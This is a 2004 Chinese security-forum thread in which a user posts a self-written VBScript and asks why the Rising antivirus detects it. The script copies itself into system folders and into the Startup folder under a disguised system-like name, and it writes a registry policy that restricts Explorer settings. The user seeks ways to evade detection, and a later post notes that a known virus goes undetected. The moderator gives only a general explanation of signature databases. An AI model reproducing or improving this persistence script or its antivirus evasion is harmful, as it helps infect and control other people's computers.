|
作者: badangel [badangel] 论坛用户 | 登录 |
在一台有瑞星杀毒的软件的机子上, 没有写注册表动作的时候都是好的, 可是一有发现写注册表的动作, 它就会发现了。On Error Resume Next Set fs=CreateObject("Scripting.FileSystemObject") Set 45=fs.GetSpecialFolder(0) Set 46=fs.GetSpecialFolder(1) Set so=CreateObject("Scripting.FileSystemObject") dim d Set d=CreateObject("Wscript.Shell") so.GetFile(WScript.ScriptFullName).Copy(45&"\reba.vbs") so.GetFile(WScript.ScriptFullName).Copy(46&"\reba.vbs") so.GetFile(WScript.ScriptFullName).Copy(45&"\Start Menu\Programs\启动\Win32system.vbs") so.GetFile(WScript.ScriptFullName).Copy("d:\456"&"\reba.vbs") d.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" ' 一加进后面这个写注册表的文件就会被发现 还有那边可以找到关天vbscript的语法对象操作的内容 |
地主 发表时间: 04-01-01 11:58 |
回复: badangel [badangel] 论坛用户 | 登录 |
什么没有人会吗? 介绍一个比较简单的方法吧。 新欢乐时光在这边就不会被杀了。 |
B1层 发表时间: 04-01-01 21:14 |
回复: tuzi [tuzi] 版主 | 登录 |
杀毒软件为什么可以查杀病毒 那是因为它里面有个病毒库 类似于 网上抓逃犯的一样 有照片 来一个嫌疑人 对对 如果是 就抓 如果不是 就放 |
B2层 发表时间: 04-01-01 23:00 |
回复: badangel [badangel] 论坛用户 | 登录 |
但是一有改注册表的行为他就要杀了。 那个语句是全新的。 自己写的 |
B3层 发表时间: 04-01-08 20:12 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号